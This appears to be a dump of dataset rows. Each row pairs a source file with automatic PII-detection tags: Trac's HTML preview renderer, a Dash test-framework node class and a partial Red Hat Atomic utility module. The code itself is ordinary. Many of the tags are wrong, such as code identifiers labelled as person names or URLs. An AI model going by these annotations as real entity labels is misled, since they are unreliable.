+ expanded_content = None + for qr, renderer in candidates: + if force_source and not getattr(renderer, 'returns_source', False): + continue # skip non-source renderers in force_source mode + if isinstance(content, Content): + content.reset() + try: + ann_names = ', '.join(annotations) if annotations else \ + 'no annotations' + self.log.debug('Trying to render HTML preview using %s [%s]', + renderer.__class__.__name__, ann_names) + + # check if we need to perform a tab expansion + rendered_content = content + if getattr(renderer, 'expand_tabs', False): + if expanded_content is None: + content = content_to_unicode(self.env, content, + full_mimetype) + expanded_content = content.expandtabs(self.tab_width) + rendered_content = expanded_content + + result = renderer.render(context, full_mimetype, + rendered_content, filename, url) + if not result: + continue + + if not (force_source or getattr(renderer, 'returns_source', + False)): + # Direct rendering of content + if isinstance(result, basestring): + if not isinstance(result, unicode): + result = to_unicode(result) + return Markup(to_unicode(result)) + elif isinstance(result, Fragment): + return result.generate() + else: + return result + + # Render content as source code + if annotations: + m = context.req.args.get('marks') if context.req else None + return self._render_source(context, result, annotations, + m and Ranges(m)) + else: + if isinstance(result, list): + result = Markup('\n').join(result) + return tag.div(class_='code')(tag.pre(result)).generate() + + except Exception, e: + self.log.warning('HTML preview using %s failed: %s', + renderer.__class__.__name__, + exception_to_unicode(e, traceback=True)) + if context.req and not context.get_hint('disable_warnings'): + from trac.web.chrome import add_warning + add_warning(context.req, + _(""HTML preview using %(renderer)s failed (%(err)s)"", + renderer=renderer.__class__.__name__, + err=exception_to_unicode(e))) + + def _render_source(self, context, stream, annotations, marks=None): + from trac.web.chrome import add_warning + annotators, labels, titles = {}, {}, {} + for annotator in self.annotators: + atype, alabel, atitle = annotator.get_annotation_type() + if atype in annotations: + labels[atype] = alabel + titles[atype] = atitle + annotators[atype] = annotator + annotations = [a for a in annotations if a in annotators] + + if isinstance(stream, list): + stream = HTMLParser(StringIO(u'\n'.join(stream))) + elif isinstance(stream, unicode): + text = stream + def linesplitter(): + for line in text.splitlines(True): + yield TEXT, line, (None, -1, -1) + stream = linesplitter() + + annotator_datas = [] + for a in annotations: + annotator = annotators[a] + try: + data = (annotator, annotator.get_annotation_data(context)) + except TracError, e: + self.log.warning(""Can't use annotator '%s': %s"", a, e.message) + add_warning(context.req, tag.strong( + tag_(""Can't use %(annotator)s annotator: %(error)s"", + annotator=tag.em(a), error=tag.pre(e.message)))) + data = (None, None) + annotator_datas.append(data) + + def _head_row(): + return tag.tr( + [tag.th(labels[a], class_=a, title=titles[a]) + for a in annotations] + + [tag.th(u'\xa0', class_='content')] + ) + + def _body_rows(): + for idx, line in enumerate(_group_lines(stream)): + row = tag.tr() + if marks and idx + 1 in marks: + row(class_='hilite') + for annotator, data in annotator_datas: + if annotator: + annotator.annotate_row(context, row, idx+1, line, data) + else: + row.append(tag.td()) + row.append(tag.td(line)) + yield row + + 
return tag.table(class_='code')( + tag.thead(_head_row()), + tag.tbody(_body_rows()) + ) + + def get_max_preview_size(self): + """""":deprecated: use `max_preview_size` attribute directly."""""" + return self.max_preview_size + + def get_charset(self, content='', mimetype=None): + """"""Infer the character encoding from the `content` or the `mimetype`. + + `content` is either a `str` or an `unicode` object. + + The charset will be determined using this order: + * from the charset information present in the `mimetype` argument + * auto-detection of the charset from the `content` + * the configured `default_charset` + """""" + if mimetype: + ctpos = mimetype.find('charset=') + if ctpos >= 0: + return mimetype[ctpos + 8:].strip() + if isinstance(content, str): + utf = detect_unicode(content) + if utf is not None: + return utf + return self.default_charset + + @property + def mime_map(self): + # Extend default extension to MIME type mappings with configured ones + if not self._mime_map: + self._mime_map = MIME_MAP.copy() + for mapping in self.config['mimeviewer'].getlist('mime_map'): + if ':' in mapping: + assocations = mapping.split(':') + for keyword in assocations: # Note: [0] kept on purpose + self._mime_map[keyword] = assocations[0] + return self._mime_map + + def get_mimetype(self, filename, content=None): + """"""Infer the MIME type from the `filename` or the `content`. + + `content` is either a `str` or an `unicode` object. + + Return the detected MIME type, augmented by the + charset information (i.e. ""; charset=...""), + or `None` if detection failed. + """""" + + mimetype = get_mimetype(filename, content, self.mime_map) + charset = None + if mimetype: + charset = self.get_charset(content, mimetype) + if mimetype and charset and not 'charset' in mimetype: + mimetype += '; charset=' + charset + return mimetype + + def is_binary(self, mimetype=None, filename=None, content=None): + """"""Check if a file must be considered as binary."""""" + if not mimetype and filename: + mimetype = self.get_mimetype(filename, content) + if mimetype: + mimetype = ct_mimetype(mimetype) + if mimetype in self.treat_as_binary: + return True + if content is not None and is_binary(content): + return True + return False + + def to_utf8(self, content, mimetype=None): + """"""Convert an encoded `content` to utf-8. + + :deprecated: since 0.10, you should use `unicode` strings only. + """""" + return to_utf8(content, self.get_charset(content, mimetype)) + + def to_unicode(self, content, mimetype=None, charset=None): + """"""Convert `content` (an encoded `str` object) to an `unicode` object. + + This calls `trac.util.to_unicode` with the `charset` provided, + or the one obtained by `Mimeview.get_charset()`. + """""" + if not charset: + charset = self.get_charset(content, mimetype) + return to_unicode(content, charset) + + def configured_modes_mapping(self, renderer): + """"""Return a MIME type to `(mode,quality)` mapping for given `option`"""""" + types, option = {}, '%s_modes' % renderer + for mapping in self.config['mimeviewer'].getlist(option): + if not mapping: + continue + try: + mimetype, mode, quality = mapping.split(':') + types[mimetype] = (mode, int(quality)) + except (TypeError, ValueError): + self.log.warning(""Invalid mapping '%s' specified in '%s' "" + ""option."", mapping, option) + return types + + def preview_data(self, context, content, length, mimetype, filename, + url=None, annotations=None, force_source=False): + """"""Prepares a rendered preview of the given `content`. 
+ + Note: `content` will usually be an object with a `read` method. + """""" + data = {'raw_href': url, 'size': length, + 'max_file_size': self.max_preview_size, + 'max_file_size_reached': False, + 'rendered': None, + } + if length >= self.max_preview_size: + data['max_file_size_reached'] = True + else: + result = self.render(context, mimetype, content, filename, url, + annotations, force_source=force_source) + data['rendered'] = result + return data + + def send_converted(self, req, in_type, content, selector, filename='file'): + """"""Helper method for converting `content` and sending it directly. + + `selector` can be either a key or a MIME Type."""""" + from trac.web.api import RequestDone + content, output_type, ext = self.convert_content(req, in_type, + content, selector) + if isinstance(content, unicode): + content = content.encode('utf-8') + req.send_response(200) + req.send_header('Content-Type', output_type) + req.send_header('Content-Length', len(content)) + if filename: + req.send_header('Content-Disposition', + content_disposition(filename='%s.%s' % + (filename, ext))) + req.end_headers() + req.write(content) + raise RequestDone + + +def _group_lines(stream): + space_re = re.compile('(?P<spaces> (?: +))|^(?P<tag><\w+.*?>)?( )') + def pad_spaces(match): + m = match.group('spaces') + if m: + div, mod = divmod(len(m), 2) + return div * u'\xa0 ' + mod * u'\xa0' + return (match.group('tag') or '') + u'\xa0' + + def _generate(): + stack = [] + def _reverse(): + for event in reversed(stack): + if event[0] is START: + yield END, event[1][0], event[2] + else: + yield END_NS, event[1][0], event[2] + + for kind, data, pos in stream: + if kind is TEXT: + lines = data.split('\n') + if lines: + # First element + for e in stack: + yield e + yield kind, lines.pop(0), pos + for e in _reverse(): + yield e + # Subsequent ones, prefix with \n + for line in lines: + yield TEXT, '\n', pos + for e in stack: + yield e + yield kind, line, pos + for e in _reverse(): + yield e + else: + if kind is START or kind is START_NS: + stack.append((kind, data, pos)) + elif kind is END or kind is END_NS: + stack.pop() + else: + yield kind, data, pos + + buf = [] + + # Fix the \n at EOF. + if not isinstance(stream, list): + stream = list(stream) + found_text = False + + for i in range(len(stream)-1, -1, -1): + if stream[i][0] is TEXT: + e = stream[i] + # One chance to strip a \n + if not found_text and e[1].endswith('\n'): + stream[i] = (e[0], e[1][:-1], e[2]) + if len(e[1]): + found_text = True + break + if not found_text: + return + + for kind, data, pos in _generate(): + if kind is TEXT and data == '\n': + yield Stream(buf[:]) + del buf[:] + else: + if kind is TEXT: + data = space_re.sub(pad_spaces, data) + buf.append((kind, data, pos)) + if buf: + yield Stream(buf[:]) + + +# -- Default annotators + +class LineNumberAnnotator(Component): + """"""Text annotator that adds a column with line numbers."""""" + implements(IHTMLPreviewAnnotator) + + # ITextAnnotator methods + + def get_annotation_type(self): + return 'lineno', _('Line'), _('Line numbers') + + def get_annotation_data(self, context): + return None + + def annotate_row(self, context, row, lineno, line, data): + row.append(tag.th(id='L%s' % lineno)( + tag.a(lineno, href='#L%s' % lineno) + )) + + +# -- Default renderers + +class PlainTextRenderer(Component): + """"""HTML preview renderer for plain text, and fallback for any kind of text + for which no more specific renderer is available. 
+ """""" + implements(IHTMLPreviewRenderer) + + expand_tabs = True + returns_source = True + + def get_quality_ratio(self, mimetype): + if mimetype in Mimeview(self.env).treat_as_binary: + return 0 + return 1 + + def render(self, context, mimetype, content, filename=None, url=None): + if is_binary(content): + self.log.debug(""Binary data; no preview available"") + return + + self.log.debug(""Using default plain text mimeviewer"") + return content_to_unicode(self.env, content, mimetype) + + +class ImageRenderer(Component): + """"""Inline image display. + + This component doesn't need the `content` at all. + """""" + implements(IHTMLPreviewRenderer) + + def get_quality_ratio(self, mimetype): + if mimetype.startswith('image/'): + return 8 + return 0 + + def render(self, context, mimetype, content, filename=None, url=None): + if url: + return tag.div(tag.img(src=url, alt=filename), + class_='image-file') + + +class WikiTextRenderer(Component): + """"""HTML renderer for files containing Trac's own Wiki formatting markup."""""" + implements(IHTMLPreviewRenderer) + + def get_quality_ratio(self, mimetype): + if mimetype in ('text/x-trac-wiki', 'application/x-trac-wiki'): + return 8 + return 0 + + def render(self, context, mimetype, content, filename=None, url=None): + from trac.wiki.formatter import format_to_html + return format_to_html(self.env, context, + content_to_unicode(self.env, content, mimetype)) +",43065,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2004-2010'], ['DATE_TIME', '2004'], ['PERSON', 'Daniel Lundin'], ['DATE_TIME', '2005-2006'], ['PERSON', 'Christopher Lenz'], ['DATE_TIME', '2006-2007'], ['NRP', 'Christian'], ['PERSON', 'Daniel Lundin'], ['PERSON', 'Christopher Lenz'], ['PERSON', 'Markup'], ['PERSON', 'Href'], ['LOCATION', 'self.resource'], ['PERSON', '1).resource'], ['PERSON', 'oneliner'], ['NRP', 'self._hints'], ['PERSON', 'msword'], ['PERSON', ""roff troff'""], ['PERSON', ""ini cfg'""], ['PERSON', 'vba'], ['PERSON', 'ada asm asp'], ['PERSON', 'ksh lua'], ['PERSON', 'tcl tex zsh'], ['PERSON', 'mimetype'], ['PERSON', 'Mark'], ['LOCATION', 'convert_content(req'], ['LOCATION', 'mimetype'], ['PERSON', 'dylan'], ['PERSON', 'msword'], ['NRP', 'input_mimettype'], ['LOCATION', 'mimetype'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['LOCATION', ""self.log.debug('Trying""], ['NRP', 'force_source'], ['LOCATION', 'basestring'], ['PERSON', ""context.get_hint('disable_warnings""], ['PERSON', 'atitle = annotator.get_annotation_type'], ['LOCATION', 'tag_(""Can\'t'], ['PERSON', 'mimetype'], ['PERSON', 'mimetype'], ['NRP', 'force_source'], ['URL', 'self.ma'], ['PERSON', 'lineno'], ['URL', 'self.log.de'], ['URL', 'tag.im'], ['URL', 'trac.wiki.fo'], ['URL', 'http://trac.edgewall.org/wiki/TracLicense.'], ['URL', 'http://trac.edgewall.org/log/.'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', 'e:: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'genshi.co'], ['URL', 'genshi.in'], ['URL', 'trac.co'], ['URL', 'trac.co'], ['URL', 'trac.re'], ['URL', 'trac.util.tr'], ['URL', 'self.pa'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'trac.web.ch'], ['URL', 'context.resource.re'], ['URL', 'context.re'], ['URL', 'context.pa'], ['URL', 'context.ch'], ['URL', 
'context.ch'], ['URL', 'context.ch'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'context.pa'], ['URL', 'context.re'], ['URL', 'self.re'], ['URL', 'context.re'], ['URL', 'context.resource.re'], ['URL', 'resource.re'], ['URL', 'context.resource.id'], ['URL', 'resource.id'], ['URL', 'context.pa'], ['URL', 'ctx.se'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'hints.ge'], ['URL', 'ctx.se'], ['URL', 'self.pa'], ['URL', 'p.pa'], ['URL', 'TYPES.ke'], ['URL', 't.st'], ['URL', 'TYPES.se'], ['URL', 'TYPES.it'], ['URL', 're.com'], ['URL', 're.VE'], ['URL', 'mimetypes.gu'], ['URL', 're.se'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'content.re'], ['URL', 'mimeview.ma'], ['URL', 'mimeview.to'], ['URL', 'self.in'], ['URL', 'self.ma'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.input.re'], ['URL', 'self.ma'], ['URL', 'self.content.re'], ['URL', 'self.co'], ['URL', 'self.content.se'], ['URL', 'IContentConverter.ge'], ['URL', 'self.co'], ['URL', 'converter.ge'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'converter.co'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'IHTMLPreviewRenderer.re'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'renderer.ge'], ['URL', 'candidates.so'], ['URL', 'self.ma'], ['URL', 'content.re'], ['URL', 'self.log.de'], ['URL', 'renderer.re'], ['URL', 'result.ge'], ['URL', 'context.req.args.ge'], ['URL', 'context.re'], ['URL', 'tag.pr'], ['URL', 'context.re'], ['URL', 'context.ge'], ['URL', 'trac.web.ch'], ['URL', 'context.re'], ['URL', 'trac.web.ch'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'annotator.ge'], ['URL', 'e.me'], ['URL', 'context.re'], ['URL', 'tag.st'], ['URL', 'tag.pr'], ['URL', 'e.me'], ['URL', 'tag.tr'], ['URL', 'tag.th'], ['URL', 'tag.th'], ['URL', 'tag.tr'], ['URL', 'annotator.an'], ['URL', 'tag.td'], ['URL', 'tag.td'], ['URL', 'tag.th'], ['URL', 'self.ma'], ['URL', 'mimetype.fi'], ['URL', 'self.de'], ['URL', 'MAP.co'], ['URL', 'self.co'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.ge'], ['URL', 'trac.util.to'], ['URL', 'Mimeview.ge'], ['URL', 'self.ge'], ['URL', 'self.co'], ['URL', 'self.ma'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.su'], ['URL', 'tag.th'], ['URL', 'self.log.de'], ['URL', 'mimetype.st']]" +8,"#!/usr/bin/env python3 +# Copyright (c) 2017 The Bitcoin Core developers +# Distributed under the MIT software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +""""""Class for dashd node under test"""""" + +import decimal +import errno +import http.client +import json +import logging +import os +import subprocess +import time + +from .authproxy import JSONRPCException +from .mininode import NodeConn +from .util import ( + assert_equal, + get_rpc_proxy, + rpc_url, + wait_until, + p2p_port, +) + +BITCOIND_PROC_WAIT_TIMEOUT = 60 + +class TestNode(): + """"""A class for representing a dashd node under test. 
+ + This class contains: + + - state about the node (whether it's running, etc) + - a Python subprocess.Popen object representing the running process + - an RPC connection to the node + - one or more P2P connections to the node + + + To make things easier for the test writer, any unrecognised messages will + be dispatched to the RPC connection."""""" + + def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir): + self.index = i + self.datadir = os.path.join(dirname, ""node"" + str(i)) + self.rpchost = rpchost + if timewait: + self.rpc_timeout = timewait + else: + # Wait for up to 60 seconds for the RPC server to respond + self.rpc_timeout = 60 + if binary is None: + self.binary = os.getenv(""BITCOIND"", ""dashd"") + else: + self.binary = binary + self.stderr = stderr + self.coverage_dir = coverage_dir + # Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly. + self.extra_args = extra_args + self.args = [self.binary, ""-datadir="" + self.datadir, ""-server"", ""-keypool=1"", ""-discover=0"", ""-rest"", ""-logtimemicros"", ""-debug"", ""-debugexclude=libevent"", ""-debugexclude=leveldb"", ""-mocktime="" + str(mocktime), ""-uacomment=testnode%d"" % i] + + self.cli = TestNodeCLI(os.getenv(""BITCOINCLI"", ""dash-cli""), self.datadir) + + # Don't try auto backups (they fail a lot when running tests) + self.args.append(""-createwalletbackups=0"") + + self.running = False + self.process = None + self.rpc_connected = False + self.rpc = None + self.url = None + self.log = logging.getLogger('TestFramework.node%d' % i) + + self.p2ps = [] + + def __getattr__(self, name): + """"""Dispatches any unrecognised messages to the RPC connection."""""" + assert self.rpc_connected and self.rpc is not None, ""Error: no RPC connection"" + return getattr(self.rpc, name) + + def start(self, extra_args=None, stderr=None): + """"""Start the node."""""" + if extra_args is None: + extra_args = self.extra_args + if stderr is None: + stderr = self.stderr + self.process = subprocess.Popen(self.args + extra_args, stderr=stderr) + self.running = True + self.log.debug(""dashd started, waiting for RPC to come up"") + + def wait_for_rpc_connection(self): + """"""Sets up an RPC connection to the dashd process. Returns False if unable to connect."""""" + # Poll at a rate of four times per second + poll_per_s = 4 + for _ in range(poll_per_s * self.rpc_timeout): + assert self.process.poll() is None, ""dashd exited with status %i during initialization"" % self.process.returncode + try: + self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir) + self.rpc.getblockcount() + # If the call to getblockcount() succeeds then the RPC connection is up + self.rpc_connected = True + self.url = self.rpc.url + self.log.debug(""RPC successfully started"") + return + except IOError as e: + if e.errno != errno.ECONNREFUSED: # Port not yet open? + raise # unknown IO error + except JSONRPCException as e: # Initialization phase + # -28 RPC in warmup + # -342 Service unavailable, RPC server started but is shutting down due to error + if e.error['code'] != -28 and e.error['code'] != -342: + raise # unknown JSON RPC exception + except ValueError as e: # cookie file not found and no rpcuser or rpcassword. 
dashd still starting + if ""No RPC credentials"" not in str(e): + raise + time.sleep(1.0 / poll_per_s) + raise AssertionError(""Unable to connect to dashd"") + + def get_wallet_rpc(self, wallet_name): + assert self.rpc_connected + assert self.rpc + wallet_path = ""wallet/%s"" % wallet_name + return self.rpc / wallet_path + + def stop_node(self, wait=0): + """"""Stop the node."""""" + if not self.running: + return + self.log.debug(""Stopping node"") + try: + self.stop(wait=wait) + except http.client.CannotSendRequest: + self.log.exception(""Unable to stop node."") + del self.p2ps[:] + + def is_node_stopped(self): + """"""Checks whether the node has stopped. + + Returns True if the node has stopped. False otherwise. + This method is responsible for freeing resources (self.process)."""""" + if not self.running: + return True + return_code = self.process.poll() + if return_code is None: + return False + + # process has stopped. Assert that it didn't return an error code. + assert_equal(return_code, 0) + self.running = False + self.process = None + self.rpc_connected = False + self.rpc = None + self.log.debug(""Node stopped"") + return True + + def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT): + wait_until(self.is_node_stopped, timeout=timeout) + + def node_encrypt_wallet(self, passphrase): + """"""""Encrypts the wallet. + + This causes dashd to shutdown, so this method takes + care of cleaning up resources."""""" + self.encryptwallet(passphrase) + self.wait_until_stopped() + + def add_p2p_connection(self, p2p_conn, **kwargs): + """"""Add a p2p connection to the node. + + This method adds the p2p connection to the self.p2ps list and also + returns the connection to the caller."""""" + if 'dstport' not in kwargs: + kwargs['dstport'] = p2p_port(self.index) + if 'dstaddr' not in kwargs: + kwargs['dstaddr'] = '127.0.0.1' + self.p2ps.append(p2p_conn) + kwargs.update({'rpc': self.rpc, 'callback': p2p_conn}) + p2p_conn.add_connection(NodeConn(**kwargs)) + + return p2p_conn + + @property + def p2p(self): + """"""Return the first p2p connection + + Convenience property - most tests only use a single p2p connection to each + node, so this saves having to write node.p2ps[0] many times."""""" + assert self.p2ps, ""No p2p connection"" + return self.p2ps[0] + + def disconnect_p2ps(self): + """"""Close all p2p connections to the node."""""" + for p in self.p2ps: + # Connection could have already been closed by other end. + if p.connection is not None: + p.connection.disconnect_node() + self.p2ps = [] + + +class TestNodeCLI(): + """"""Interface to bitcoin-cli for an individual node"""""" + + def __init__(self, binary, datadir): + self.args = [] + self.binary = binary + self.datadir = datadir + self.input = None + + def __call__(self, *args, input=None): + # TestNodeCLI is callable with bitcoin-cli command-line args + self.args = [str(arg) for arg in args] + self.input = input + return self + + def __getattr__(self, command): + def dispatcher(*args, **kwargs): + return self.send_cli(command, *args, **kwargs) + return dispatcher + + def send_cli(self, command, *args, **kwargs): + """"""Run bitcoin-cli command. 
Deserializes returned string as python object."""""" + + pos_args = [str(arg) for arg in args] + named_args = [str(key) + ""="" + str(value) for (key, value) in kwargs.items()] + assert not (pos_args and named_args), ""Cannot use positional arguments and named arguments in the same bitcoin-cli call"" + p_args = [self.binary, ""-datadir="" + self.datadir] + self.args + if named_args: + p_args += [""-named""] + p_args += [command] + pos_args + named_args + process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True) + cli_stdout, cli_stderr = process.communicate(input=self.input) + returncode = process.poll() + if returncode: + # Ignore cli_stdout, raise with cli_stderr + raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr) + return json.loads(cli_stdout, parse_float=decimal.Decimal) +",9148,"[['DATE_TIME', '2017'], ['DATE_TIME', '.authproxy'], ['LOCATION', 'JSONRPCException'], ['PERSON', 'dirname'], ['PERSON', 'extra_args'], ['LOCATION', 'rpchost'], ['DATE_TIME', 'up to 60 seconds'], ['URL', 'logging.ge'], ['URL', 'TestFramework.no'], ['PERSON', 'extra_args'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.log.de'], ['LOCATION', 'JSONRPCException'], ['LOCATION', 'http.client'], ['LOCATION', 'p2p_conn'], ['PERSON', ""kwargs['dstport""], ['LOCATION', 'self.p2ps.append(p2p_conn'], ['PERSON', 'returncode ='], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'http.cl'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.bi'], ['URL', 'os.ge'], ['URL', 'self.bi'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.cl'], ['URL', 'os.ge'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.st'], ['URL', 'self.pro'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.pro'], ['URL', 'self.process.re'], ['URL', 'self.co'], ['URL', 'self.rpc.ge'], ['URL', 'e.er'], ['URL', 'errno.EC'], ['URL', 'e.er'], ['URL', 'e.er'], ['URL', 'time.sl'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.st'], ['URL', 'http.client.Ca'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.log.de'], ['URL', 'self.is'], ['URL', 'self.in'], ['URL', 'conn.ad'], ['URL', 'p.co'], ['URL', 'p.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'kwargs.it'], ['URL', 'self.bi'], ['URL', 'self.ar'], ['URL', 'process.com'], ['URL', 'self.in'], ['URL', 'subprocess.Ca'], ['URL', 'self.bi'], ['URL', 'decimal.De']]" +9,"# !/usr/bin/python +# Copyright (C) 2015 Red Hat, All rights reserved. 
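+# --- Editor's illustrative sketch (not part of either surrounding entry) ---
+# The TestNodeCLI class that closes the dashd entry above turns arbitrary
+# attribute access into `bitcoin-cli <command>` invocations via __getattr__.
+# A minimal standalone version of that dispatch pattern (class and binary
+# names here are hypothetical):
+import subprocess
+
+class CLIProxy(object):
+    # proxy.getblockcount(...) becomes: <binary> getblockcount <args...>
+    def __init__(self, binary):
+        self.binary = binary
+
+    def __getattr__(self, command):
+        def dispatcher(*args):
+            argv = [self.binary, command] + [str(a) for a in args]
+            return subprocess.check_output(argv, universal_newlines=True)
+        return dispatcher
+
+# CLIProxy('bitcoin-cli').getblockcount() runs: bitcoin-cli getblockcount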
+# AUTHORS: Alex Collins dummy@email.com + +import sys +import json +import subprocess +import collections +from fnmatch import fnmatch as matches +from docker.utils import kwargs_from_env + +import docker +import selinux + +""""""Atomic Utility Module"""""" + +ReturnTuple = collections.namedtuple('ReturnTuple', + ['return_code', 'stdout', 'stderr']) + +if sys.version_info[0] < 3: + input = raw_input +else: + input = input + + +def _decompose(compound_name): + """""" '[reg/]repo[:tag]' -> (reg, repo, tag) """""" + reg, repo, tag = '', compound_name, '' + if '/' in repo: + reg, repo = repo.split('/', 1) + if ':' in repo: + repo, tag = repo.rsplit(':', 1) + return reg, repo, tag + + +def image_by_name(img_name, images=None): + """""" + Returns a list of image data for images which match img_name. Will + optionally take a list of images from a docker.Client.images + query to avoid multiple docker queries. + """""" + i_reg, i_rep, i_tag = _decompose(img_name) + + # Correct for bash-style matching expressions. + if not i_reg: + i_reg = '*' + if not i_tag: + i_tag = '*' + + # If the images were not passed in, go get them. + if images is None: + c = docker.Client(**kwargs_from_env()) + images = c.images(all=False) + + valid_images = [] + for i in images: + for t in i['RepoTags']: + reg, rep, tag = _decompose(t) + if matches(reg, i_reg) \ + and matches(rep, i_rep) \ + and matches(tag, i_tag): + valid_images.append(i) + break + # Some repo after decompose end up with the img_name + # at the end. i.e. rhel7/rsyslog + if rep.endswith(img_name): + valid_images.append(i) + break + return valid_images + + +def subp(cmd): + """""" + Run a command as a subprocess. + Return a triple of return code, standard out, standard err. + """""" + proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, + stderr=subprocess.PIPE) + out, err = proc.communicate() + return ReturnTuple(proc.returncode, stdout=out, stderr=err) + + +def default_container_context(): + if selinux.is_selinux_enabled() != 0: + fd = open(selinux.selinux_lxc_contexts_path()) + for i in fd.readlines(): + name, context = i.split(""="") + if name.strip() == ""file"": + return context.strip(""\n\"" "") + return """" + + +def writeOut(output, lf=""\n""): + sys.stdout.flush() + sys.stdout.write(str(output) + lf) + + +def output_json(json_data): + ''' Pretty print json data ''' + writeOut(json.dumps(json_data, indent=4, separators=(',', ': '))) + + +def print_scan_summary(json_data, names=None): + ''' + Print a summary of the data returned from a + CVE scan. 
+ ''' + max_col_width = 50 + min_width = 15 + + def _max_width(data): + max_name = 0 + for name in data: + max_name = len(data[name]) if len(data[name]) > max_name \ + else max_name + # If the max name length is less than min_width + if max_name < min_width: + max_name = min_width + + # If the max name is greater than the max column length + # we wish to use + if max_name > max_col_width: + max_name = max_col_width + + return max_name + + clean = True + + if len(names) > 0: + max_width = _max_width(names) + else: + max_width = min_width + template = ""{0:"" + str(max_width) + ""} {1:5} {2:5} {3:5} {4:5}"" + sevs = ['critical', 'important', 'moderate', 'low'] + writeOut(template.format(""Container/Image"", ""Cri"", ""Imp"", ""Med"", ""Low"")) + writeOut(template.format(""-"" * max_width, ""---"", ""---"", ""---"", ""---"")) + res_summary = json_data['results_summary'] + for image in res_summary.keys(): + image_res = res_summary[image] + if 'msg' in image_res.keys(): + tmp_tuple = (image_res['msg'], """", """", """", """") + else: + if len(names) < 1: + image_name = image[:max_width] + else: + image_name = names[image][-max_width:] + if len(image_name) == max_col_width: + image_name = '...' + image_name[-(len(image_name) - 3):] + + tmp_tuple = tuple([image_name] + + [str(image_res[sev]) for sev in sevs]) + sev_results = [image_res[sev] for sev in + sevs if image_res[sev] > 0] + if len(sev_results) > 0: + clean = False + writeOut(template.format(*tmp_tuple)) + writeOut("""") + return clean + + +def print_detail_scan_summary(json_data, names=None): + ''' + Print a detailed summary of the data returned from + a CVE scan. + ''' + clean = True + sevs = ['Critical', 'Important', 'Moderate', 'Low'] + cve_summary = json_data['host_results'] + image_template = "" {0:10}: {1}"" + cve_template = "" {0:10}: {1}"" + for image in cve_summary.keys(): + image_res = cve_summary[image] + writeOut("""") + writeOut(image[:12]) + if not image_res['isRHEL']: + writeOut(image_template.format(""Result"", + ""Not based on Red Hat "" + ""Enterprise Linux"")) + continue + else: + writeOut(image_template.format(""OS"", image_res['os'].rstrip())) + scan_results = image_res['cve_summary']['scan_results'] + + for sev in sevs: + if sev in scan_results: + clean = False + writeOut(image_template.format(sev, + str(scan_results[sev]['num']))) + for cve in scan_results[sev]['cves']: + writeOut(cve_template.format(""CVE"", cve['cve_title'])) + writeOut(cve_template.format(""CVE URL"", + cve['cve_ref_url'])) + writeOut(cve_template.format(""RHSA ID"", + cve['rhsa_ref_id'])) + writeOut(cve_template.format(""RHSA URL"", + cve['rhsa_ref_url'])) + writeOut("""") + return clean + + +def get_mounts_by_path(): + ''' + Gets all mounted devices and paths + :return: list of dicts of mounted devices and related information, + one per mount point + ''' + mount_info = [] + with open('/proc/mounts', 'r') as f: + for line in f: + _tmp = line.split("" "") + mount_info.append({'path': _tmp[1], + 'device': 